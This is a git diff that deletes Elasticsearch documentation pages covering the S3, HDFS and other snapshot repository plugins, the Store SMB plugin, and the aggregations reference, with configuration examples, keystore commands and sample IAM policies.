- "type": "hdfs", - "settings": { - "uri": "hdfs://namenode:8020/", - "path": "/user/elasticsearch/repositories/my_hdfs_repository", - "security.principal": "elasticsearch/_HOST@REALM" - } -} ----- -// TEST[skip:we don't have hdfs set up while testing this] - -[[repository-hdfs-security-authorization]] -[discrete] -===== Authorization -Once Elasticsearch is connected and authenticated to HDFS, HDFS will infer a username to use for -authorizing file access for the client. By default, it picks this username from the primary part of -the kerberos principal used to authenticate to the service. 
For example, in the case of a principal -like `elasticsearch@REALM` or `elasticsearch/hostname@REALM` then the username that HDFS -extracts for file access checks will be `elasticsearch`. - -NOTE: The repository plugin makes no assumptions of what Elasticsearch's principal name is. The main fragment of the -Kerberos principal is not required to be `elasticsearch`. If you have a principal or service name that works better -for you or your organization then feel free to use it instead! diff --git a/docs/plugins/repository-s3.asciidoc b/docs/plugins/repository-s3.asciidoc deleted file mode 100644 index cd893b948be..00000000000 --- a/docs/plugins/repository-s3.asciidoc +++ /dev/null @@ -1,473 +0,0 @@ -[[repository-s3]] -=== S3 Repository Plugin - -The S3 repository plugin adds support for using AWS S3 as a repository for -{ref}/modules-snapshots.html[Snapshot/Restore]. - -*If you are looking for a hosted solution of Elasticsearch on AWS, please visit -https://www.elastic.co/cloud/.* - -:plugin_name: repository-s3 -include::install_remove.asciidoc[] - -[[repository-s3-usage]] -==== Getting Started - -The plugin provides a repository type named `s3` which may be used when creating -a repository. The repository defaults to using -https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html[ECS -IAM Role] or -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html[EC2 -IAM Role] credentials for authentication. The only mandatory setting is the -bucket name: - -[source,console] ----- -PUT _snapshot/my_s3_repository -{ - "type": "s3", - "settings": { - "bucket": "my-bucket" - } -} ----- -// TEST[skip:we don't have s3 setup while testing this] - -*bucket:* The name of the bucket to be used for snapshots. (Mandatory) -Note that the bucket name can be between 3 and 63 characters long, and can contain only lower-case characters, numbers, periods, and dashes it cannot contain underscores, end with a dash, have consecutive periods, or use dashes adjacent to periods - -The bucket naming convention is outlines in AWS here [https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-s3-bucket-naming-requirements.html] - - - -[[repository-s3-client]] -==== Client Settings - -The client that you use to connect to S3 has a number of settings available. -The settings have the form `s3.client.CLIENT_NAME.SETTING_NAME`. By default, -`s3` repositories use a client named `default`, but this can be modified using -the <> `client`. For example: - -[source,console] ----- -PUT _snapshot/my_s3_repository -{ - "type": "s3", - "settings": { - "bucket": "my-bucket", - "client": "my-alternate-client" - } -} ----- -// TEST[skip:we don't have S3 setup while testing this] - -Most client settings can be added to the `elasticsearch.yml` configuration file -with the exception of the secure settings, which you add to the {es} keystore. -For more information about creating and updating the {es} keystore, see -{ref}/secure-settings.html[Secure settings]. 
- -For example, if you want to use specific credentials to access S3 then run the -following commands to add these credentials to the keystore: - -[source,sh] ----- -bin/elasticsearch-keystore add s3.client.default.access_key -bin/elasticsearch-keystore add s3.client.default.secret_key -# a session token is optional so the following command may not be needed -bin/elasticsearch-keystore add s3.client.default.session_token ----- - -If instead you want to use the instance role or container role to access S3 -then you should leave these settings unset. You can switch from using specific -credentials back to the default of using the instance role or container role by -removing these settings from the keystore as follows: - -[source,sh] ----- -bin/elasticsearch-keystore remove s3.client.default.access_key -bin/elasticsearch-keystore remove s3.client.default.secret_key -# a session token is optional so the following command may not be needed -bin/elasticsearch-keystore remove s3.client.default.session_token ----- - -*All* client secure settings of this plugin are -{ref}/secure-settings.html#reloadable-secure-settings[reloadable]. After you -reload the settings, the internal `s3` clients, used to transfer the snapshot -contents, will utilize the latest settings from the keystore. Any existing `s3` -repositories, as well as any newly created ones, will pick up the new values -stored in the keystore. - -NOTE: In-progress snapshot/restore tasks will not be preempted by a *reload* of -the client's secure settings. The task will complete using the client as it was -built when the operation started. - -The following list contains the available client settings. Those that must be -stored in the keystore are marked as "secure" and are *reloadable*; the other -settings belong in the `elasticsearch.yml` file. - -`access_key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An S3 access key. If set, the `secret_key` setting must also be specified. - If unset, the client will use the instance or container role instead. - -`secret_key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An S3 secret key. If set, the `access_key` setting must also be specified. - -`session_token` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An S3 session token. If set, the `access_key` and `secret_key` settings - must also be specified. - -`endpoint`:: - - The S3 service endpoint to connect to. This defaults to `s3.amazonaws.com` - but the - https://docs.aws.amazon.com/general/latest/gr/rande.html#s3_region[AWS - documentation] lists alternative S3 endpoints. If you are using an - <> then you should - set this to the service's endpoint. - -`protocol`:: - - The protocol to use to connect to S3. Valid values are either `http` or - `https`. Defaults to `https`. - -`proxy.host`:: - - The host name of a proxy to connect to S3 through. - -`proxy.port`:: - - The port of a proxy to connect to S3 through. - -`proxy.username` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - The username to connect to the `proxy.host` with. - -`proxy.password` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - The password to connect to the `proxy.host` with. - -`read_timeout`:: - - The socket timeout for connecting to S3. The value should specify the unit. 
- For example, a value of `5s` specifies a 5 second timeout. The default value - is 50 seconds. - -`max_retries`:: - - The number of retries to use when an S3 request fails. The default value is - `3`. - -`use_throttle_retries`:: - - Whether retries should be throttled (i.e. should back off). Must be `true` - or `false`. Defaults to `true`. - -`path_style_access`:: - - Whether to force the use of the path style access pattern. If `true`, the - path style access pattern will be used. If `false`, the access pattern will - be automatically determined by the AWS Java SDK (See - https://docs.aws.amazon.com/AWSJavaSDK/latest/javadoc/com/amazonaws/services/s3/AmazonS3Builder.html#setPathStyleAccessEnabled-java.lang.Boolean-[AWS - documentation] for details). Defaults to `false`. - -[[repository-s3-path-style-deprecation]] -NOTE: In versions `7.0`, `7.1`, `7.2` and `7.3` all bucket operations used the -https://aws.amazon.com/blogs/aws/amazon-s3-path-deprecation-plan-the-rest-of-the-story/[now-deprecated] -path style access pattern. If your deployment requires the path style access -pattern then you should set this setting to `true` when upgrading. - -`disable_chunked_encoding`:: - - Whether chunked encoding should be disabled or not. If `false`, chunked - encoding is enabled and will be used where appropriate. If `true`, chunked - encoding is disabled and will not be used, which may mean that snapshot - operations consume more resources and take longer to complete. It should - only be set to `true` if you are using a storage service that does not - support chunked encoding. See the - https://docs.aws.amazon.com/AWSJavaSDK/latest/javadoc/com/amazonaws/services/s3/AmazonS3Builder.html#disableChunkedEncoding--[AWS - Java SDK documentation] for details. Defaults to `false`. - -`region`:: - - Allows specifying the signing region to use. Specificing this setting manually should not be necessary for most use cases. Generally, - the SDK will correctly guess the signing region to use. It should be considered an expert level setting to support S3-compatible APIs - that require https://docs.aws.amazon.com/general/latest/gr/signature-version-4.html[v4 signatures] and use a region other than the - default `us-east-1`. Defaults to empty string which means that the SDK will try to automatically determine the correct signing region. - -`signer_override`:: - - Allows specifying the name of the signature algorithm to use for signing requests by the S3 client. Specifying this setting should not - be necessary for most use cases. It should be considered an expert level setting to support S3-compatible APIs that do not support the - signing algorithm that the SDK automatically determines for them. - See the - https://docs.aws.amazon.com/AWSJavaSDK/latest/javadoc/com/amazonaws/ClientConfiguration.html#setSignerOverride-java.lang.String-[AWS - Java SDK documentation] for details. Defaults to empty string which means that no signing algorithm override will be used. - -[discrete] -[[repository-s3-compatible-services]] -===== S3-compatible services - -There are a number of storage systems that provide an S3-compatible API, and -the `repository-s3` plugin allows you to use these systems in place of AWS S3. -To do so, you should set the `s3.client.CLIENT_NAME.endpoint` setting to the -system's endpoint. This setting accepts IP addresses and hostnames and may -include a port. For example, the endpoint may be `172.17.0.2` or -`172.17.0.2:9000`. 
You may also need to set `s3.client.CLIENT_NAME.protocol` to -`http` if the endpoint does not support HTTPS. - -https://minio.io[Minio] is an example of a storage system that provides an -S3-compatible API. The `repository-s3` plugin allows {es} to work with -Minio-backed repositories as well as repositories stored on AWS S3. Other -S3-compatible storage systems may also work with {es}, but these are not -covered by the {es} test suite. - -Note that some storage systems claim to be S3-compatible without correctly -supporting the full S3 API. The `repository-s3` plugin requires full -compatibility with S3. In particular it must support the same set of API -endpoints, return the same errors in case of failures, and offer a consistency -model no weaker than S3's when accessed concurrently by multiple nodes. If you -wish to use another storage system with the `repository-s3` plugin then you -will need to work with the supplier of the storage system to address any -incompatibilities you encounter. Incompatible error codes and consistency -models may be particularly hard to track down since errors and consistency -failures are usually rare and hard to reproduce. - -[[repository-s3-repository]] -==== Repository Settings - -The `s3` repository type supports a number of settings to customize how data is -stored in S3. These can be specified when creating the repository. For example: - -[source,console] ----- -PUT _snapshot/my_s3_repository -{ - "type": "s3", - "settings": { - "bucket": "my-bucket", - "another_setting": "setting-value" - } -} ----- -// TEST[skip:we don't have S3 set up while testing this] - -The following settings are supported: - -`bucket`:: -(Required) -Name of the S3 bucket to use for snapshots. -+ -The bucket name must adhere to Amazon's -https://docs.aws.amazon.com/AmazonS3/latest/dev/BucketRestrictions.html#bucketnamingrules[S3 -bucket naming rules]. - -`client`:: - - The name of the <> to use to connect to S3. - Defaults to `default`. - -`base_path`:: - - Specifies the path within bucket to repository data. Defaults to value of - `repositories.s3.base_path` or to root directory if not set. Previously, - the base_path could take a leading `/` (forward slash). However, this has - been deprecated and setting the base_path now should omit the leading `/`. - -`chunk_size`:: - - Big files can be broken down into chunks during snapshotting if needed. - Specify the chunk size as a value and unit, for example: - `1GB`, `10MB`, `5KB`, `500B`. Defaults to `1GB`. - -`compress`:: - - When set to `true` metadata files are stored in compressed format. This - setting doesn't affect index files that are already compressed by default. - Defaults to `false`. - -include::repository-shared-settings.asciidoc[] - -`server_side_encryption`:: - - When set to `true` files are encrypted on server side using AES256 - algorithm. Defaults to `false`. - -`buffer_size`:: - - Minimum threshold below which the chunk is uploaded using a single request. - Beyond this threshold, the S3 repository will use the - https://docs.aws.amazon.com/AmazonS3/latest/dev/uploadobjusingmpu.html[AWS - Multipart Upload API] to split the chunk into several parts, each of - `buffer_size` length, and to upload each part in its own request. Note that - setting a buffer size lower than `5mb` is not allowed since it will prevent - the use of the Multipart API and may result in upload errors. It is also not - possible to set a buffer size greater than `5gb` as it is the maximum upload - size allowed by S3. 
Defaults to the minimum between `100mb` and `5%` of the - heap size. - -`canned_acl`:: - - The S3 repository supports all - https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl[S3 - canned ACLs] : `private`, `public-read`, `public-read-write`, - `authenticated-read`, `log-delivery-write`, `bucket-owner-read`, - `bucket-owner-full-control`. Defaults to `private`. You could specify a - canned ACL using the `canned_acl` setting. When the S3 repository creates - buckets and objects, it adds the canned ACL into the buckets and objects. - -`storage_class`:: - - Sets the S3 storage class for objects stored in the snapshot repository. - Values may be `standard`, `reduced_redundancy`, `standard_ia`, `onezone_ia` - and `intelligent_tiering`. Defaults to `standard`. - Changing this setting on an existing repository only affects the - storage class for newly created objects, resulting in a mixed usage of - storage classes. Additionally, S3 Lifecycle Policies can be used to manage - the storage class of existing objects. Due to the extra complexity with the - Glacier class lifecycle, it is not currently supported by the plugin. For - more information about the different classes, see - https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html[AWS - Storage Classes Guide] - -NOTE: The option of defining client settings in the repository settings as -documented below is considered deprecated, and will be removed in a future -version. - -In addition to the above settings, you may also specify all non-secure <> -settings in the repository settings. In this case, the client settings found in -the repository settings will be merged with those of the named client used by -the repository. Conflicts between client and repository settings are resolved -by the repository settings taking precedence over client settings. - -For example: - -[source,console] ----- -PUT _snapshot/my_s3_repository -{ - "type": "s3", - "settings": { - "client": "my-client", - "bucket": "my-bucket", - "endpoint": "my.s3.endpoint" - } -} ----- -// TEST[skip:we don't have s3 set up while testing this] - -This sets up a repository that uses all client settings from the client -`my_client_name` except for the `endpoint` that is overridden to -`my.s3.endpoint` by the repository settings. - -[[repository-s3-permissions]] -===== Recommended S3 Permissions - -In order to restrict the Elasticsearch snapshot process to the minimum required -resources, we recommend using Amazon IAM in conjunction with pre-existing S3 -buckets. Here is an example policy which will allow the snapshot access to an S3 -bucket named "snaps.example.com". This may be configured through the AWS IAM -console, by creating a Custom Policy, and using a Policy Document similar to -this (changing snaps.example.com to your bucket name). - -[source,js] ----- -{ - "Statement": [ - { - "Action": [ - "s3:ListBucket", - "s3:GetBucketLocation", - "s3:ListBucketMultipartUploads", - "s3:ListBucketVersions" - ], - "Effect": "Allow", - "Resource": [ - "arn:aws:s3:::snaps.example.com" - ] - }, - { - "Action": [ - "s3:GetObject", - "s3:PutObject", - "s3:DeleteObject", - "s3:AbortMultipartUpload", - "s3:ListMultipartUploadParts" - ], - "Effect": "Allow", - "Resource": [ - "arn:aws:s3:::snaps.example.com/*" - ] - } - ], - "Version": "2012-10-17" -} ----- -// NOTCONSOLE - -You may further restrict the permissions by specifying a prefix within the -bucket, in this example, named "foo". 
- -[source,js] ----- -{ - "Statement": [ - { - "Action": [ - "s3:ListBucket", - "s3:GetBucketLocation", - "s3:ListBucketMultipartUploads", - "s3:ListBucketVersions" - ], - "Condition": { - "StringLike": { - "s3:prefix": [ - "foo/*" - ] - } - }, - "Effect": "Allow", - "Resource": [ - "arn:aws:s3:::snaps.example.com" - ] - }, - { - "Action": [ - "s3:GetObject", - "s3:PutObject", - "s3:DeleteObject", - "s3:AbortMultipartUpload", - "s3:ListMultipartUploadParts" - ], - "Effect": "Allow", - "Resource": [ - "arn:aws:s3:::snaps.example.com/foo/*" - ] - } - ], - "Version": "2012-10-17" -} ----- -// NOTCONSOLE - -The bucket needs to exist to register a repository for snapshots. If you did not -create the bucket then the repository registration will fail. - -[[repository-s3-aws-vpc]] -[discrete] -==== AWS VPC Bandwidth Settings - -AWS instances resolve S3 endpoints to a public IP. If the Elasticsearch -instances reside in a private subnet in an AWS VPC then all traffic to S3 will -go through the VPC's NAT instance. If your VPC's NAT instance is a smaller -instance size (e.g. a t2.micro) or is handling a high volume of network traffic -your bandwidth to S3 may be limited by that NAT instance's networking bandwidth -limitations. Instead we recommend creating a https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints.html[VPC endpoint] -that enables connecting to S3 in instances that reside in a private subnet in -an AWS VPC. This will eliminate any limitations imposed by the network -bandwidth of your VPC's NAT instance. - -Instances residing in a public subnet in an AWS VPC will connect to S3 via the -VPC's internet gateway and not be bandwidth limited by the VPC's NAT instance. diff --git a/docs/plugins/repository-shared-settings.asciidoc b/docs/plugins/repository-shared-settings.asciidoc deleted file mode 100644 index 13c2716c52d..00000000000 --- a/docs/plugins/repository-shared-settings.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -`max_restore_bytes_per_sec`:: - - Throttles per node restore rate. Defaults to unlimited. - Note that restores are also throttled through {ref}/recovery.html[recovery settings]. - -`max_snapshot_bytes_per_sec`:: - - Throttles per node snapshot rate. Defaults to `40mb` per second. - -`readonly`:: - - Makes repository read-only. Defaults to `false`. diff --git a/docs/plugins/repository.asciidoc b/docs/plugins/repository.asciidoc deleted file mode 100644 index 58da220862b..00000000000 --- a/docs/plugins/repository.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[repository]] -== Snapshot/Restore Repository Plugins - -Repository plugins extend the {ref}/modules-snapshots.html[Snapshot/Restore] -functionality in Elasticsearch by adding repositories backed by the cloud or -by distributed file systems: - -[discrete] -==== Core repository plugins - -The core repository plugins are: - -<>:: - -The S3 repository plugin adds support for using S3 as a repository. - -<>:: - -The Azure repository plugin adds support for using Azure as a repository. - -<>:: - -The Hadoop HDFS Repository plugin adds support for using HDFS as a repository. - -<>:: - -The GCS repository plugin adds support for using Google Cloud Storage service as a repository. 
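-
-Each of these repository types is registered in the same way through the
-{ref}/modules-snapshots.html[snapshot API]; only the `type` and its
-type-specific settings change. Below is a minimal, hypothetical sketch (the
-repository name `my_backup` and the bucket name are placeholders) that also
-shows the throttling and `readonly` settings shared by all of these repository
-plugins:
-
-[source,console]
------
-PUT _snapshot/my_backup
-{
-  "type": "s3",
-  "settings": {
-    "bucket": "my-bucket",
-    "max_snapshot_bytes_per_sec": "40mb",
-    "max_restore_bytes_per_sec": "40mb",
-    "readonly": false
-  }
-}
------
-// TEST[skip:no repository plugin is configured while testing this]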
-
-
-[discrete]
-=== Community contributed repository plugins
-
-The following plugin has been contributed by our community:
-
-* https://github.com/BigDataBoutique/elasticsearch-repository-swift[Openstack Swift] (by Wikimedia Foundation and BigData Boutique)
-
-
-include::repository-azure.asciidoc[]
-
-include::repository-s3.asciidoc[]
-
-include::repository-hdfs.asciidoc[]
-
-include::repository-gcs.asciidoc[]
diff --git a/docs/plugins/security.asciidoc b/docs/plugins/security.asciidoc
deleted file mode 100644
index 89927a3d6da..00000000000
--- a/docs/plugins/security.asciidoc
+++ /dev/null
@@ -1,24 +0,0 @@
-[[security]]
-== Security Plugins
-
-Security plugins add a security layer to Elasticsearch.
-
-[discrete]
-=== Core security plugins
-
-The core security plugins are:
-
-link:/products/x-pack/security[X-Pack]::
-
-X-Pack is the Elastic product that makes it easy for anyone to add
-enterprise-grade security to their Elastic Stack. Designed to address the
-growing security needs of thousands of enterprises using the Elastic Stack
-today, X-Pack provides peace of mind when it comes to protecting your data.
-
-[discrete]
-=== Community contributed security plugins
-
-The following plugin has been contributed by our community:
-
-* https://github.com/sscarduzio/elasticsearch-readonlyrest-plugin[Readonly REST]:
-  High performance access control for the Elasticsearch native REST API (by Simone Scarduzio)
diff --git a/docs/plugins/store-smb.asciidoc b/docs/plugins/store-smb.asciidoc
deleted file mode 100644
index 0dcdbb42595..00000000000
--- a/docs/plugins/store-smb.asciidoc
+++ /dev/null
@@ -1,55 +0,0 @@
-[[store-smb]]
-=== Store SMB Plugin
-
-The Store SMB plugin works around a bug in Windows SMB and Java on Windows.
-
-:plugin_name: store-smb
-include::install_remove.asciidoc[]
-
-[[store-smb-usage]]
-==== Working around a bug in Windows SMB and Java on Windows
-
-When a shared file system based on the SMB protocol (such as Azure File Service) is used to store indices, Lucene
-opens index segment files with a write-only flag. This is the _correct_ way to open the files, as they will only be
-used for writes, and it allows different FS implementations to optimize for this. Sadly, on Windows with SMB, this disables
-the cache manager, causing writes to be slow. This has been described in
-https://issues.apache.org/jira/browse/LUCENE-6176[LUCENE-6176], but it affects every Java program, not only Lucene.
-This needs to be fixed outside of Elasticsearch and Lucene, either in Windows or in OpenJDK. For now, we provide
-experimental support for opening the files with a read flag; the proper fix, however, belongs in OpenJDK or Windows.
-
-The Store SMB plugin provides two storage types optimized for SMB:
-
-`smb_mmap_fs`::
-
-    an SMB-specific implementation of the default
-    {ref}/index-modules-store.html#mmapfs[mmap fs]
-
-`smb_simple_fs`::
-
-    an SMB-specific implementation of the default
-    {ref}/index-modules-store.html#simplefs[simple fs]
-
-To use one of these storage types, install the Store SMB plugin and restart the node,
-then configure Elasticsearch to use the storage type you want.
-
-This can be configured for all indices by adding this to the `elasticsearch.yml` file:
-
-[source,yaml]
-----
-index.store.type: smb_simple_fs
-----
-
-Note that this setting applies only to newly created indices.
- -It can also be set on a per-index basis at index creation time: - -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "index.store.type": "smb_mmap_fs" - } -} ----- diff --git a/docs/plugins/store.asciidoc b/docs/plugins/store.asciidoc deleted file mode 100644 index b3d732217a5..00000000000 --- a/docs/plugins/store.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[[store]] -== Store Plugins - -Store plugins offer alternatives to default Lucene stores. - -[discrete] -=== Core store plugins - -The core store plugins are: - -<>:: - -The Store SMB plugin works around for a bug in Windows SMB and Java on windows. - - -include::store-smb.asciidoc[] - diff --git a/docs/reference/aggregations.asciidoc b/docs/reference/aggregations.asciidoc deleted file mode 100644 index 57298e337ee..00000000000 --- a/docs/reference/aggregations.asciidoc +++ /dev/null @@ -1,434 +0,0 @@ -[[search-aggregations]] -= Aggregations - -[partintro] --- -An aggregation summarizes your data as metrics, statistics, or other analytics. -Aggregations help you answer questions like: - -* What's the average load time for my website? -* Who are my most valuable customers based on transaction volume? -* What would be considered a large file on my network? -* How many products are in each product category? - -{es} organizes aggregations into three categories: - -* <> aggregations that calculate metrics, -such as a sum or average, from field values. - -* <> aggregations that -group documents into buckets, also called bins, based on field values, ranges, -or other criteria. - -* <> aggregations that take input from -other aggregations instead of documents or fields. - -[discrete] -[[run-an-agg]] -=== Run an aggregation - -You can run aggregations as part of a <> by specifying the <>'s `aggs` parameter. The -following search runs a -<> on -`my-field`: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] - -Aggregation results are in the response's `aggregations` object: - -[source,console-result] ----- -{ - "took": 78, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 5, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [...] - }, - "aggregations": { - "my-agg-name": { <1> - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [] - } - } -} ----- -// TESTRESPONSE[s/"took": 78/"took": "$body.took"/] -// TESTRESPONSE[s/\.\.\.$/"took": "$body.took", "timed_out": false, "_shards": "$body._shards", /] -// TESTRESPONSE[s/"hits": \[\.\.\.\]/"hits": "$body.hits.hits"/] -// TESTRESPONSE[s/"buckets": \[\]/"buckets":\[\{"key":"get","doc_count":5\}\]/] - -<1> Results for the `my-agg-name` aggregation. - -[discrete] -[[change-agg-scope]] -=== Change an aggregation's scope - -Use the `query` parameter to limit the documents on which an aggregation runs: - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "range": { - "@timestamp": { - "gte": "now-1d/d", - "lt": "now/d" - } - } - }, - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] - -[discrete] -[[return-only-agg-results]] -=== Return only aggregation results - -By default, searches containing an aggregation return both search hits and -aggregation results. 
To return only aggregation results, set `size` to `0`: - -[source,console] ----- -GET /my-index-000001/_search -{ - "size": 0, - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] - -[discrete] -[[run-multiple-aggs]] -=== Run multiple aggregations - -You can specify multiple aggregations in the same request: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-first-agg-name": { - "terms": { - "field": "my-field" - } - }, - "my-second-agg-name": { - "avg": { - "field": "my-other-field" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] -// TEST[s/my-other-field/http.response.bytes/] - -[discrete] -[[run-sub-aggs]] -=== Run sub-aggregations - -Bucket aggregations support bucket or metric sub-aggregations. For example, a -terms aggregation with an <> -sub-aggregation calculates an average value for each bucket of documents. There -is no level or depth limit for nesting sub-aggregations. - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - }, - "aggs": { - "my-sub-agg-name": { - "avg": { - "field": "my-other-field" - } - } - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/_search/_search?size=0/] -// TEST[s/my-field/http.request.method/] -// TEST[s/my-other-field/http.response.bytes/] - -The response nests sub-aggregation results under their parent aggregation: - -[source,console-result] ----- -{ - ... - "aggregations": { - "my-agg-name": { <1> - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "foo", - "doc_count": 5, - "my-sub-agg-name": { <2> - "value": 75.0 - } - } - ] - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"took": "$body.took", "timed_out": false, "_shards": "$body._shards", "hits": "$body.hits",/] -// TESTRESPONSE[s/"key": "foo"/"key": "get"/] -// TESTRESPONSE[s/"value": 75.0/"value": $body.aggregations.my-agg-name.buckets.0.my-sub-agg-name.value/] - -<1> Results for the parent aggregation, `my-agg-name`. -<2> Results for `my-agg-name`'s sub-aggregation, `my-sub-agg-name`. - -[discrete] -[[add-metadata-to-an-agg]] -=== Add custom metadata - -Use the `meta` object to associate custom metadata with an aggregation: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "terms": { - "field": "my-field" - }, - "meta": { - "my-metadata-field": "foo" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/_search/_search?size=0/] - -The response returns the `meta` object in place: - -[source,console-result] ----- -{ - ... - "aggregations": { - "my-agg-name": { - "meta": { - "my-metadata-field": "foo" - }, - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [] - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"took": "$body.took", "timed_out": false, "_shards": "$body._shards", "hits": "$body.hits",/] - -[discrete] -[[return-agg-type]] -=== Return the aggregation type - -By default, aggregation results include the aggregation's name but not its type. -To return the aggregation type, use the `typed_keys` query parameter. 
- -[source,console] ----- -GET /my-index-000001/_search?typed_keys -{ - "aggs": { - "my-agg-name": { - "histogram": { - "field": "my-field", - "interval": 1000 - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/typed_keys/typed_keys&size=0/] -// TEST[s/my-field/http.response.bytes/] - -The response returns the aggregation type as a prefix to the aggregation's name. - -IMPORTANT: Some aggregations return a different aggregation type from the -type in the request. For example, the terms, -<>, -and <> -aggregations return different aggregations types depending on the data type of -the aggregated field. - -[source,console-result] ----- -{ - ... - "aggregations": { - "histogram#my-agg-name": { <1> - "buckets": [] - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"took": "$body.took", "timed_out": false, "_shards": "$body._shards", "hits": "$body.hits",/] -// TESTRESPONSE[s/"buckets": \[\]/"buckets":\[\{"key":1070000.0,"doc_count":5\}\]/] - -<1> The aggregation type, `histogram`, followed by a `#` separator and the aggregation's name, `my-agg-name`. - -[discrete] -[[use-scripts-in-an-agg]] -=== Use scripts in an aggregation - -Some aggregations support <>. You can -use a `script` to extract or generate values for the aggregation: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "histogram": { - "interval": 1000, - "script": { - "source": "doc['my-field'].value.length()" - } - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.request.method/] - -If you also specify a `field`, the `script` modifies the field values used in -the aggregation. The following aggregation uses a script to modify `my-field` -values: - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "histogram": { - "field": "my-field", - "interval": 1000, - "script": "_value / 1000" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.response.bytes/] - -Some aggregations only work on specific data types. Use the `value_type` -parameter to specify a data type for a script-generated value or an unmapped -field. `value_type` accepts the following values: - -* `boolean` -* `date` -* `double`, used for all floating-point numbers -* `long`, used for all integers -* `ip` -* `string` - -[source,console] ----- -GET /my-index-000001/_search -{ - "aggs": { - "my-agg-name": { - "histogram": { - "field": "my-field", - "interval": 1000, - "script": "_value / 1000", - "value_type": "long" - } - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/my-field/http.response.bytes/] - -[discrete] -[[agg-caches]] -=== Aggregation caches - -For faster responses, {es} caches the results of frequently run aggregations in -the <>. To get cached results, use the -same <> for each search. If you -don't need search hits, <> to avoid -filling the cache. - -{es} routes searches with the same preference string to the same shards. If the -shards' data doesn’t change between searches, the shards return cached -aggregation results. - -[discrete] -[[limits-for-long-values]] -=== Limits for `long` values - -When running aggregations, {es} uses <> values to hold and -represent numeric data. As a result, aggregations on <> numbers -greater than +2^53^+ are approximate. 
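Returning to the caching behaviour described above, the following sketch (index, field, and preference value are placeholders) shows how a dashboard that reruns the same aggregation can pin the `preference` parameter so the request is routed to the same shards and can be answered from the shard request cache:

[source,console]
----
GET /my-index-000001/_search?preference=my-dashboard-session
{
  "size": 0,    <1>
  "aggs": {
    "my-agg-name": {
      "terms": {
        "field": "my-field"
      }
    }
  }
}
----
<1> Skipping search hits keeps the cached entry small, as recommended above.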
--- - -include::aggregations/bucket.asciidoc[] - -include::aggregations/metrics.asciidoc[] - -include::aggregations/pipeline.asciidoc[] diff --git a/docs/reference/aggregations/bucket.asciidoc b/docs/reference/aggregations/bucket.asciidoc deleted file mode 100644 index 233bc0da648..00000000000 --- a/docs/reference/aggregations/bucket.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[search-aggregations-bucket]] -== Bucket aggregations - -Bucket aggregations don't calculate metrics over fields like the metrics aggregations do, but instead, they create -buckets of documents. Each bucket is associated with a criterion (depending on the aggregation type) which determines -whether or not a document in the current context "falls" into it. In other words, the buckets effectively define document -sets. In addition to the buckets themselves, the `bucket` aggregations also compute and return the number of documents -that "fell into" each bucket. - -Bucket aggregations, as opposed to `metrics` aggregations, can hold sub-aggregations. These sub-aggregations will be -aggregated for the buckets created by their "parent" bucket aggregation. - -There are different bucket aggregators, each with a different "bucketing" strategy. Some define a single bucket, some -define fixed number of multiple buckets, and others dynamically create the buckets during the aggregation process. - -NOTE: The maximum number of buckets allowed in a single response is limited by a -dynamic cluster setting named -<>. It defaults to 65,535. -Requests that try to return more than the limit will fail with an exception. - -include::bucket/adjacency-matrix-aggregation.asciidoc[] - -include::bucket/autodatehistogram-aggregation.asciidoc[] - -include::bucket/children-aggregation.asciidoc[] - -include::bucket/composite-aggregation.asciidoc[] - -include::bucket/datehistogram-aggregation.asciidoc[] - -include::bucket/daterange-aggregation.asciidoc[] - -include::bucket/diversified-sampler-aggregation.asciidoc[] - -include::bucket/filter-aggregation.asciidoc[] - 